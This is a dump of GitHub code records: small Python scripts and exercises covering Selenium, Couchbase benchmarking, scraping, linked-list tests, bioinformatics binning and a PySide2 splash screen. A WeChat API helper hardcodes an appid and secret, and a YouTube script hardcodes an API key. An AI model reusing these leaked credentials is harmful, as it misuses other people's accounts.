\"X\": 0,\n \"Y\": 3,\n \"Z\": 6\n}\n\nwith open('input.txt', 'r') as in_file:\n first_score = 0\n second_score = 0\n for line in in_file:\n opp_move, my_move = line.strip().split(\" \")\n first_score += shape_score[my_move] + outcome_dict[opp_move][my_move]\n second_score += result_points[my_move] + result_to_choice[opp_move][my_move]\n \n print(f'First part: {first_score}')\n print(f'Second part: 
{second_score}')","repo_name":"landgrafjacob/AdventOfCode2022","sub_path":"day02/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24811397002","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium import webdriver\nimport math\n\nbrowser = webdriver.Chrome()\n\nbrowser.get(\"http://suninjuly.github.io/explicit_wait2.html\")\n\n# говорим Selenium проверять в течение 12 секунд, пока цена не станет $100\nprice = WebDriverWait(browser, 12).until(EC.text_to_be_present_in_element((By.ID, \"price\"), text_=\"$100\"))\n\n#нажимаем на кнопку после того как цена 100\nbutton = browser.find_element_by_css_selector(\"#book\")\nbutton.click()\n\n#решаем пример\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\nx_element = browser.find_element_by_css_selector('#input_value')\nx = x_element.text\ny = calc(x)\n\n# Мой код, который заполняет поле\ninput1 = browser.find_element_by_css_selector('#answer')\ninput1.send_keys(y)\n\n#нажимаем на кнопку\nbutton = browser.find_element_by_css_selector(\"#solve\")\nbutton.click()\n","repo_name":"vikitikipiki/stepik_auto_tests_course","sub_path":"2.4.8.py","file_name":"2.4.8.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72736246302","text":"import argparse\nfrom threading import Thread\nfrom time import sleep, time\nfrom couchbase_v2.bucket import Bucket, FMT_BYTES\nfrom couchbase_core.transcoder import Transcoder\n\nap = argparse.ArgumentParser()\n\nap.add_argument('-t', '--threads', default=4, type=int,\n help=\"Number of threads to spawn. 0 means no threads \"\n \"but workload will still run in the main thread\")\n\nap.add_argument('-d', '--delay', default=0, type=float,\n help=\"Number of seconds to wait between each op. 
\"\n \"may be a fraction\")\n\nap.add_argument('-U', '--connstr', default='couchbase://localhost/default',\n help=\"Connection string\")\n\nap.add_argument('-p', '--password', default=None, type=str)\nap.add_argument('-b', '--bucket', default=None, type=str)\nap.add_argument('-u', '--user', default=None, type=str)\n\nap.add_argument('-D', '--duration', default=10, type=int,\n help=\"Duration of run (in seconds)\")\nap.add_argument('-T', '--transcoder', default=False,\n action='store_true',\n help=\"Use the Transcoder object rather than built-in \"\n \"conversion routines\")\n\nap.add_argument('--ksize', default=12, type=int,\n help=\"Key size to use\")\n\nap.add_argument('--vsize', default=128, type=int,\n help=\"Value size to use\")\nap.add_argument('--iops', default=False, action='store_true',\n help=\"Use Pure-Python IOPS plugin\")\n\nap.add_argument('--batch', '-N', default=1, type=int,\n help=\"Number of commands to schedule per iteration\")\n\noptions = ap.parse_args()\nDO_UNLOCK_GIL = options.threads > 0\nTC = Transcoder()\n\n\nclass Worker(Thread):\n def __init__(self):\n self.delay = options.delay\n self.key = 'K' * options.ksize\n self.value = b'V' * options.vsize\n self.kv = {}\n for x in range(options.batch):\n self.kv[self.key + str(x)] = self.value\n self.wait_time = 0\n self.opcount = 0\n connopts = { \"connstr\" : options.connstr,\n \"unlock_gil\": DO_UNLOCK_GIL,\n \"password\": options.password}\n if options.iops:\n connopts[\"experimental_gevent_support\"] = True\n\n self.cb = Bucket(**connopts)\n\n if options.transcoder:\n self.cb.transcoder = TC\n self.end_time = time() + options.duration\n super(Worker, self).__init__()\n\n def run(self, *args, **kwargs):\n cb = self.cb\n\n while time() < self.end_time:\n begin_time = time()\n rv = cb.upsert_multi(self.kv, format=FMT_BYTES)\n assert rv.all_ok, \"Operation failed: \"\n self.wait_time += time() - begin_time\n\n if self.delay:\n sleep(self.delay)\n\n self.opcount += options.batch\n\n\nglobal_begin = None\nworker_threads = []\nif not options.threads:\n # No threding requested:\n w = Worker()\n worker_threads.append(w)\n global_begin = time()\n w.run()\nelse:\n for x in range(options.threads):\n worker_threads.append(Worker())\n\n global_begin = time()\n for t in worker_threads:\n t.start()\n\n for t in worker_threads:\n t.join()\n\nglobal_duration = time() - global_begin\ntotal_ops = sum([w.opcount for w in worker_threads])\ntotal_time = 0\nfor t in worker_threads:\n total_time += t.wait_time\n\nprint(\"Total run took an absolute time of %0.2f seconds\" % (global_duration,))\nprint(\"Did a total of %d operations\" % (total_ops,))\nprint(\"Total wait time of %0.2f seconds\" % (total_time,))\nprint(\"[WAIT] %0.2f ops/second\" % (float(total_ops)/float(total_time),))\nprint(\"[ABS] %0.2f ops/second\" % (float(total_ops)/float(global_duration),))\n","repo_name":"griels/couchbase-python-client-ng","sub_path":"examples/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24375603548","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/11/30 16:46\n# @Author : Limusen\n# @File : common_api\n\n\nimport requests\nfrom common.localconfig_utlis import local_config\n\n\ndef get_access_token_api(session, grant_type, appid, secret):\n params = {\n \"grant_type\": grant_type,\n \"appid\": appid,\n \"secret\": secret,\n }\n headers = {'content_type': 'application/json'}\n response = 
session.get(url=local_config.URL + '/cgi-bin/token',\n                           params=params,\n                           headers=headers)\n    return response\n\n\ndef get_token_value(session):\n    response = get_access_token_api(session,\n                                    \"client_credential\",\n                                    \"wxb637f897f0bf1f0d\",\n                                    \"501123d2d367b109a5cb9a9011d0f084\")\n    return response.json()['access_token']\n\n\ndef create_usr_tag_api(session, access_token, tag_json):\n    \"\"\"\n    Create a user tag.\n    :param access_token:\n    :param tag_json:\n    :return:\n    \"\"\"\n    params = {\n        \"access_token\": access_token\n    }\n    json_data = tag_json\n    headers = {'content_type': 'application/json'}\n    response = session.post(url=local_config.URL + \"/cgi-bin/tags/create\",\n                            params=params,\n                            json=json_data,\n                            headers=headers)\n\n    return response\n\n\ndef delete_usr_tag_api(session, access_token, tag_json):\n    \"\"\"\n    Delete a user tag.\n    :param access_token:\n    :param tag_json:\n    :return:\n    \"\"\"\n    params = {\n        \"access_token\": access_token\n    }\n    json_data = tag_json\n    response = session.post(url=local_config.URL + \"/cgi-bin/tags/delete\",\n                            params=params,\n                            json=json_data)\n    return response\n","repo_name":"liousAlready/Basic_api_test","sub_path":"common/common_api.py","file_name":"common_api.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30656662093","text":"'''\n1\n2 1\n4 2 1\n8 4 2 1\n16 8 4 2 1\n32 16 8 4 2 1\n '''\n# first input the number of rows\nrows = int(input())\n# outer loop\nfor i in range(1, rows+1):\n    # Inner loop start, stop and step\n    for j in range(-1+i, -1, -1):\n        print(2**j, end=' ')\n    # for new lines\n    print('')\n\n# list comprehension\na = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nsquare = [i*i for i in a if i%2 == 0]\nprint(square)\n\n# lambda function map, reduce, filter\nsquare_list = list(map(lambda x: x*x, a))\nprint(square_list)\n\n","repo_name":"amar-jain123/PythonLoop","sub_path":"loop/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4757866636","text":"import pytest\nfrom linkedlist import *\n\ndef mergeLinkedLists(linkedList_one, linkedList_two):\n    \"\"\"Merge two doubly linked lists that are in sorted order.\n\n    Merge two doubly linked lists that are in sorted order. The merged list will also be in sorted order. 
The merge is done in place, so the returned linked list is `linkedList_one` with its head updated.\n\n    Args:\n        linkedList_one (LinkedList): The first linked list to merge.\n        linkedList_two (LinkedList): The second linked list to merge.\n\n    Returns:\n        LinkedList: The merged linked list, with its head updated to reflect the new head of the merged list.\n    \"\"\"\n\n    # Grab the heads of the two linked lists and their lengths\n    head1 = linkedList_one.head\n    head2 = linkedList_two.head\n    len1 = linkedList_one.length\n    len2 = linkedList_two.length\n\n    # Pick the smaller of the two head values as the head of the merged list\n    if head1.data < head2.data:\n        new_head = head1\n        head1 = head1.next\n    else:\n        new_head = head2\n        head2 = head2.next\n\n    # Start the current pointer at the head of the merged list\n    current = new_head\n\n    # Walk both linked lists simultaneously, always appending the smaller element to the merged list\n    while head1 and head2:\n        if head1.data < head2.data:\n            current.next = head1\n            head1 = head1.next\n        else:\n            current.next = head2\n            head2 = head2.next\n        current = current.next\n\n    # Append the remainder of whichever linked list was not exhausted\n    current.next = head1 if head1 else head2\n\n    # Update the head of the first linked list to the merged list's head\n    linkedList_one.head = new_head\n    linkedList_one.length = len1 + len2\n\n    # Return the merged, sorted linked list\n    return linkedList_one\n\n@pytest.fixture(scope=\"session\")\ndef data():\n    \n    array = []\n    \n    # test 1 data\n    array.append([[2,6,7,8],[1,3,4,5,9,10]])\n\n    # test 2 data\n    array.append([[1,2,3,4,5],[6,7,8,9,10]])\n\n    # test 3 data\n    array.append([[6,7,8,9,10],[1,2,3,4,5]])\n\n    # test 4 data\n    array.append([[1,3,5,7,9],[2,4,6,8,10]])\n\n    # test 5 data\n    array.append([[0,1,2,3,4,5,7,8,9,10],[6]])\n\n    # test 6 data\n    array.append([[6],[0,1,2,3,4,5,7,8,9,10]])\n\n    # test 7 data\n    array.append([[1],[2]])\n\n    # test 8 data\n    array.append([[2],[1]])\n\n    # test 9 data\n    array.append([[1,1,1,3,4,5,5,5,10],[1,1,2,2,5,6,10,10]])\n    \n    return array\n\ndef test_1(data):\n    \"\"\"\n    Test evaluation for [[2,6,7,8],[1,3,4,5,9,10]]\n    \"\"\"\n    linkedlist_one = LinkedList()\n    for item in data[0][0]:\n        linkedlist_one.append(item)\n\n    linkedlist_two = LinkedList()\n    for item in data[0][1]:\n        linkedlist_two.append(item)\n\n    linkedlist_test = LinkedList()\n    for item in [1,2,3,4,5,6,7,8,9,10]:\n        linkedlist_test.append(item)\n\n    assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\n\ndef test_2(data):\n    \"\"\"\n    Test evaluation for [[1,2,3,4,5],[6,7,8,9,10]]\n    \"\"\"\n    linkedlist_one = LinkedList()\n    for item in data[1][0]:\n        linkedlist_one.append(item)\n\n    linkedlist_two = LinkedList()\n    for item in data[1][1]:\n        linkedlist_two.append(item)\n\n    linkedlist_test = LinkedList()\n    for item in [1,2,3,4,5,6,7,8,9,10]:\n        linkedlist_test.append(item)\n\n    assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_3(data):\n    \"\"\"\n    Test evaluation for [[6,7,8,9,10],[1,2,3,4,5]]\n    \"\"\"\n    linkedlist_one = LinkedList()\n    for item in data[2][0]:\n        linkedlist_one.append(item)\n\n    linkedlist_two = LinkedList()\n    for item in data[2][1]:\n        linkedlist_two.append(item)\n\n    linkedlist_test = LinkedList()\n    for item in [1,2,3,4,5,6,7,8,9,10]:\n        linkedlist_test.append(item)\n\n    assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_4(data):\n    \"\"\"\n    Test evaluation for [[1,3,5,7,9],[2,4,6,8,10]]\n    \"\"\"\n    linkedlist_one = 
LinkedList()\n for item in data[3][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[3][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_5(data):\n \"\"\"\n Test evaluation for [[0,1,2,3,4,5,7,8,9,10],[6]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[4][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[4][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [0,1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_6(data):\n \"\"\"\n Test evaluation for [[6],[0,1,2,3,4,5,7,8,9,10]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[5][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[5][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [0,1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_7(data):\n \"\"\"\n Test evaluation for [[1],[2]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[6][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[6][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_8(data):\n \"\"\"\n Test evaluation for [[2],[1]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[7][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[7][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_9(data):\n \"\"\"\n Test evaluation for [[1,1,1,3,4,5,5,5,10],[1,1,2,2,5,6,10,10]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[8][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[8][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,1,1,1,1,2,2,3,4,5,5,5,5,6,10,10,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n","repo_name":"JoaoGabrielRA/DataStructureII","sub_path":"Week3/test_mergeLinkedLists.py","file_name":"test_mergeLinkedLists.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28766902179","text":"from playwright.sync_api import sync_playwright\n\nimport time\nimport random\nimport save_letras as sl\n\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\ninvisible_browser = False\n\ndef dibra_time(sec):\n delay = random.random()*sec\n time.sleep(delay)\n\ndef find_genres():\n res = requests.get('https://www.letras.mus.br/estilos/')\n print(\"The status code is \", res.status_code)\n soup_data = BeautifulSoup(res.text, 'html.parser')\n genres = soup_data.select(\"a[href^='/estilos/']\") \n href_genres = []\n for i in genres:\n href = href = i['href'].split('/')[-2]\n #print(href)\n href_genres.append(href)\n\n n = len(href_genres)\n print(f'All {n} genres 
found!')\n\n return(href_genres)\n\ndef find_artists_from_genre(genre):\n #genre must be in a specific format to find the right url\n with sync_playwright() as p:\n browser = p.chromium.launch(headless=invisible_browser)\n page = browser.new_page()\n dibra_time(4)\n page.goto(f\"https://www.letras.mus.br/estilos/{genre}/artistas.html\")\n\n page.locator('a:has-text(\"Ver todos os artistas\")').click()\n time.sleep(3)\n ul_artists = page.locator('ul[class=\"cnt-list cnt-list--col3\"]')\n print(ul_artists)\n\n artists = ul_artists.locator('a')\n n_artists = artists.count()\n\n print(f\"{n_artists} artists are found.\") \n\n href_artists = []\n for i in range(n_artists):\n href = artists.nth(i).get_attribute('href')\n #print(href)\n href_artists.append(href)\n\n print(f'{genre} finished!')\n\n browser.close()\n\n return(href_artists)\n\ndef find_songs_from_artist(artist):\n dibra_time(1)\n res = requests.get(f'https://www.letras.mus.br/{artist}/')\n soup_data = BeautifulSoup(res.text, 'html.parser')\n songs = soup_data.select(\"a[class='song-name']\")\n if (len(songs) == 0):\n songs = soup_data.select(\"li[class='cnt-list-row -song']\")\n href_songs = []\n for i in songs:\n href = i.find('a').get('href')\n href_songs.append(href)\n else:\n href_songs = []\n for i in songs:\n href = i['href']\n href_songs.append(href)\n\n print(f'{artist} songs found!')\n return(href_songs)\n\n\n# artist = artists['artists'][0].replace('/','')\n# genre = genres[0].split('\\\\')[-1].replace('.txt','')\n\n# genres = find_genres()\n\n# local_artists = 'E:/coding/github/webscraping_letras/data/raw/artists'\n# local_songs = 'E:/coding/github/webscraping_letras/data/raw/songs'\n\n# for genre in genres:\n# artists = find_artists_from_genre(genre)\n# sl.save_artists_from_genre(genre,artists,local_artists)\n\ndef find_lyric_from_song(song):\n res = requests.get(f'https://www.letras.mus.br/{song}')\n soup_data = BeautifulSoup(res.text, 'html.parser')\n\n header = soup_data.select(\"div[class='cnt-head cnt-head--l']\") \n all_lyric = soup_data.select(\"div[class='cnt-letra']\") \n\n for th in header:\n artist_output = th.find('span').text\n views = th.find(\"b\").text\n name_song = th.find(\"h1\").text\n song = f'Song: {name_song}'\n artist_output = f'Artist: {artist_output}'\n print('10')\n views = f'Views: {views}'\n print(artist_output)\n\n verses = []\n\n for i in all_lyric:\n aux = i.find_all(\"p\")\n n = len(aux)\n n_verses = f'Verses: {n}'\n\n for j in aux:\n verse = j.get_text(strip=True, separator= '\\n').splitlines()\n for z in verse:\n verses.append(z)\n verses.append('\\n')\n \n output = [song, artist_output,views, n_verses, verses]\n\n return(output)","repo_name":"santosfmpedro/webscraping_letras","sub_path":"src/site_genre_playwright.py","file_name":"site_genre_playwright.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14638395499","text":"from googleapiclient.discovery import build\n\n# Set up the YouTube Data API v3 service\napi_key = 'AIzaSyAZ1hJY41i1nmpAhAOAlc4gYN-u0kh4amI'\nyoutube = build('youtube', 'v3', developerKey=api_key)\n\n# Fetch the top trending videos\nrequest = youtube.videos().list(\n part='snippet',\n chart='mostPopular',\n regionCode='US', # Replace with your desired region code\n maxResults=10 # Number of top trending videos to fetch\n)\nresponse = request.execute()\n\n# Print the titles of the top trending videos\nprint('Top trending videos on YouTube:')\nfor item in 
response['items']:\n print(item['snippet']['title'])\n","repo_name":"Huntera948/Summarizer2","sub_path":"src/testing/unused_items/YouTube.py","file_name":"YouTube.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18695176340","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the findDigits function below.\ndef findDigits(n):\n nn = str(n);\n ans=0;\n\n for i in range(len(nn)):\n if int(nn[i])==0:\n continue;\n elif n%int(nn[i])==0:\n ans+=1;\n return ans; \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input())\n\n for t_itr in range(t):\n n = int(input())\n\n result = findDigits(n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n","repo_name":"bradykim7/Algorithm","sub_path":"HackerRank/Problem_Solving/implementation/Find_Digits.py","file_name":"Find_Digits.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6074223518","text":"import sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(x, y, matrix):\n global area\n area += 1\n # 방문한 위치 0으로 변경\n matrix[x][y] = 0\n # 상하 좌우 확인\n for i in range(4):\n x0 = x + dx[i]\n y0 = y + dy[i]\n if (0<= x0 < M) and (0<= y0 < N):\n if matrix[x0][y0] != 0:\n dfs(x0, y0, matrix)\n\n# 영역 총 크기 받아서 map 할당\nM, N, K = map(int, input().split())\nMap = [[1] * N for _ in range(M)]\n\n# 사각형 영역에 대해 0으로 변환\nfor i in range(K):\n x1, y1, x2, y2 = map(int, input().split())\n for k in range(x1, x2): # [0, 1, 2]\n for j in range(y1, y2): # [4, 4]\n Map[j][k] = 0\n\n# 상하좌우 좌표\ndx = [0, 0, 1, -1]\ndy = [-1, 1, 0, 0]\n\n# 전체영역을 돌면서 영역의 크기 저장\nwhole_area = []\nfor i in range(M):\n for j in range(N):\n area = 0\n if Map[i][j] != 0:\n dfs(i, j, Map)\n whole_area.append(area)\n \nwhole_area.sort() \n\n# 구분된 영역의 수\nprint(len(whole_area))\n\n#구분된 영역을 오름차순으로 출력\nprint(*whole_area)\n\n# ver2\nimport sys\nsys.setrecursionlimit(10**6)\n\nM, N, K = map(int, input().split())\ngraph = [[1] * N for _ in range(M)]\n\nfor i in range(K):\n x1, y1, x2, y2 = map(int, input().split())\n for j in range(M-y1-1, M-y2-1, -1):\n for k in range(x1, x2):\n graph[j][k] = 0\n\ndef dfs(graph, y, x):\n global count\n count += 1\n graph[y][x] = 0\n\n dx = [0, 0, 1, -1]\n dy = [-1, 1, 0, 0]\n for i in range(4):\n x0 = x + dx[i]\n y0 = y + dy[i]\n if (0<= y0 < M) and (0<= x0 < N):\n if graph[y0][x0] != 0:\n dfs(graph, y0, x0)\narea_list = []\nfor y in range(M):\n for x in range(N):\n count = 0\n if graph[y][x] != 0:\n dfs(graph, y, x)\n area_list.append(count)\nprint(len(area_list))\narea_list.sort()\nprint(*area_list)\n\n","repo_name":"Sooho-Kim/Python_algorithm","sub_path":"01.baekjoon/baekjoon_2583.py","file_name":"baekjoon_2583.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23359875742","text":"#!/usr/bin/env python\n# count reads to bins with cell barcode\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='count reads to bins with bin/cell coordinate')\nparser.add_argument('-i', type=str, dest=\"input\", help='input bam file')\nparser.add_argument('-g', '--genomeSize', type=str, dest=\"genomeSize\", help='genome size')\nparser.add_argument('-b', '--binSize', type=int, dest=\"binSize\", default=5000, help='bin size')\nparser.add_argument('-o', type=str, dest=\"output\", help='output 
prefix')\n\nargs = parser.parse_args()\n\nimport sys\nimport pysam\nimport copy\nimport numpy as np\nfrom collections import Counter\nimport pybedtools\nfrom time import perf_counter as pc\nfrom scipy import sparse\nfrom scipy.sparse import save_npz\n\ndef is_sorted_queryname(header):\n \"\"\"\n Check if bam fiel is sorted by read name.\n \"\"\"\n if(\"HD\" in header):\n if(\"SO\" in header[\"HD\"]):\n if(header[\"HD\"][\"SO\"] == \"queryname\"):\n return True\n return False\n\ndef bins_maker(genomeSize, bin_size):\n genomeSizes = pybedtools.BedTool(genomeSize)\n bins = genomeSizes.window_maker(g=genomeSize, w=bin_size)\n bin_dict = {}\n idx = 0\n for i in bins:\n chr = i.chrom\n start = i.start\n end = i.end\n key = (chr+\"\\t\"+str(start)+\"\\t\"+str(end))\n bin_dict[key] = idx\n idx += 1\n return bin_dict\n\ndef get_genSize(headerSQ):\n genSize = {}\n for i in range(len(headerSQ)):\n key, values = headerSQ[i][\"SN\"], headerSQ[i][\"LN\"]\n genSize[key]= values\n return genSize\n \ndef main():\n bamf = args.input\n bin_size = int(args.binSize)\n genomeSize = args.genomeSize\n outf = args.output\n start_time = pc()\n # start reading the bam\n samfile = pysam.AlignmentFile(bamf, \"rb\")\n # check if bam file is sorted by name or not\n if not is_sorted_queryname(samfile.header):\n sys.exit(\"Error: bam needs to be sorted by read name\")\n \n # get chormosome size from header \n headerSQ = samfile.header[\"SQ\"]\n genSizes = get_genSize(headerSQ)\n bins_dict = bins_maker(genomeSize, bin_size)\n idx = 0 \n counts = {}\n barcodes = {}\n barcode_tmp = \"AAA\"\n n_lines = 0\n while True:\n try:\n read1 = next(samfile)\n read2 = next(samfile)\n except: # to the end\n break\n n_lines += 1\n if n_lines% 1000000 == 0 :\n print( \"%s read pairs processed.\"%n_lines)\n if read1.is_proper_pair:\n if read1.is_read1:\n pass\n else:\n tmp = copy.deepcopy(read1)\n read1 = read2\n read2 = tmp\n ref1 = read1.reference_name\n ref2 = read2.reference_name\n barcode = read1.qname.strip().split(\":\")[0]\n if barcode not in barcodes:\n barcodes[barcode] = idx\n idx += 1\n length = read1.reference_length\n if not read1.is_reverse:\n pos = read1.reference_start\n else:\n pos = read2.reference_start\n chrSize1 = int(genSizes[ref1])\n chrSize2 = int(genSizes[ref2])\n if(ref1 == ref2 and abs(read1.reference_start//bin_size - read1.next_reference_start//bin_size) <= 1):\n if (pos//bin_size + 1) * bin_size < chrSize1:\n key = (ref1+\"\\t\"+str((pos//bin_size) * bin_size)+\"\\t\"+str((pos//bin_size + 1) * bin_size)+\"\\t\"+read1.qname+\"\\t\"+\".\"+\"\\t\"+\"+\"+\"\\t\"+barcode)\n if key in counts:\n counts[key] += 1\n else:\n counts[key] = 1\n else:\n key = (ref1+\"\\t\"+str((pos//bin_size) * bin_size)+\"\\t\"+str(chrSize1)+\"\\t\"+read1.qname+\"\\t\"+\".\"+\"\\t\"+\"+\"+\"\\t\"+barcode)\n if key in counts:\n counts[key] += 1\n else:\n counts[key] = 1\n if(ref1 == ref2 and abs(read1.reference_start//bin_size - read1.next_reference_start//bin_size) > 1):\n midpos = pos + length * 0.5\n if (midpos//bin_size + 1) * bin_size < chrSize1:\n key = (ref1+\"\\t\"+str((midpos//bin_size) * bin_size)+\"\\t\"+str((midpos//bin_size + 1) * bin_size)+\"\\t\"+read1.qname+\"\\t\"+\".\"+\"\\t\"+\"+\"+\"\\t\"+barcode)\n if key in counts:\n counts[key] += 1\n else:\n counts[key] = 1\n else:\n key = (ref1+\"\\t\"+str((midpos//bin_size) * bin_size)+\"\\t\"+str(chrSize1)+\"\\t\"+read1.qname+\"\\t\"+\".\"+\"\\t\"+\"+\"+\"\\t\"+barcode)\n if key in counts:\n counts[key] += 1\n else:\n counts[key] = 1\n\n samfile.close()\n outbed = 
\".\".join([outf,\"bed\"])\n outmat = \".\".join([outf,\"mat\"])\n outxgi = \".\".join([outf,\"xgi\"])\n outygi = \".\".join([outf,\"ygi\"])\n outnpz = \".\".join([outf,\"npz\"])\n with open(outxgi, 'w') as outxgi:\n for key, val in barcodes.items():\n outxgi.write(key + \"\\n\")\n outxgi.close()\n\n with open(outygi, 'w') as outygi:\n for key, val in bins_dict.items():\n outygi.write(key + \"\\n\")\n outygi.close()\n\n with open(outbed, 'w') as outbed:\n for key,val in counts.items():\n outbed.write(str(key) + \"\\t\" + str(val) + \"\\n\")\n outbed.close()\n\n with open(outmat, 'w') as outmat:\n xgi = []\n ygi = []\n ct = []\n for key,val in counts.items():\n items = key.strip().split(\"\\t\")\n xgi_key = items[3]\n ygi_key = items[0]+\"\\t\"+items[1]+\"\\t\"+items[2]\n xgi_idx = barcodes[xgi_key]\n ygi_idx = bins_dict[ygi_key]\n outmat.write(str(xgi_idx) + \"\\t\" + str(ygi_idx) + \"\\t\" + str(val) + \"\\n\")\n xgi.append(xgi_idx)\n ygi.append(ygi_idx)\n ct.append(val)\n cooMx = sparse.coo_matrix((ct,(xgi,ygi)))\n save_npz(outnpz, cooMx)\n outmat.close()\n end_time = pc()\n print('Used (secs): ', end_time - start_time)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"yal054/snATAC","sub_path":"snATAC.ct2bin.py","file_name":"snATAC.ct2bin.py","file_ext":"py","file_size_in_byte":6148,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"35609804872","text":"# Kullanıcının girdiği boy ve ağırlık değerlerine göre vücut kitle indeksini (VKİ = ağırlık/(boy*boy)) hesaplayınız.\nkisiKilo = input(\"Lütfen kilonuzu giriniz: \")\nkisiBoy = input(\"Lütfen boyunuzu giriniz(metre cinsinde): \")\n\nkisiKiloAsFloat = float(kisiKilo)\nkisiBoyAsFloat = float(kisiBoy)\n\nvkindeks = kisiKiloAsFloat/(kisiBoyAsFloat*kisiBoyAsFloat)\n\nprint(f\"Vücut kitle indeksiniz: {vkindeks}\")\n","repo_name":"ibrahimkaraca19/Istanbul-Kodluyor-Odevler","sub_path":"24 Ekim Ödevleri/1-vki.py","file_name":"1-vki.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39681986002","text":"import sys\nfrom PySide2 import QtCore\nfrom PySide2.QtGui import (QColor)\nfrom PySide2.QtWidgets import *\n\n# SPLASH SCREEN\nfrom ui_splash_screen import Ui_SplashScreen\n\n\n# GLOBALS\ncounter = 0\n\n\n# LOADING SCREEN\nclass SplashScreen(QMainWindow):\n def __init__(self):\n QMainWindow.__init__(self)\n self.ui = Ui_SplashScreen()\n self.ui.setupUi(self)\n\n # REMOVE TITLE BAR\n self.setWindowFlag(QtCore.Qt.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n\n # DROP SHADOW EFFECT\n self.shadow = QGraphicsDropShadowEffect(self)\n self.shadow.setBlurRadius(20)\n self.shadow.setXOffset(0)\n self.shadow.setYOffset(0)\n self.shadow.setColor(QColor(0, 0, 0, 60))\n self.ui.dropShadowFrame.setGraphicsEffect(self.shadow)\n\n # TIMER START\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.progress)\n\n # TIMER IN MILLISECONDS\n self.timer.start(35)\n\n # CHANGE DESCRIPTION\n\n # Initial Text\n self.ui.label_description.setText(\"WELCOME TO MY APPLICATION\")\n\n # Change Texts\n QtCore.QTimer.singleShot(1500, lambda: 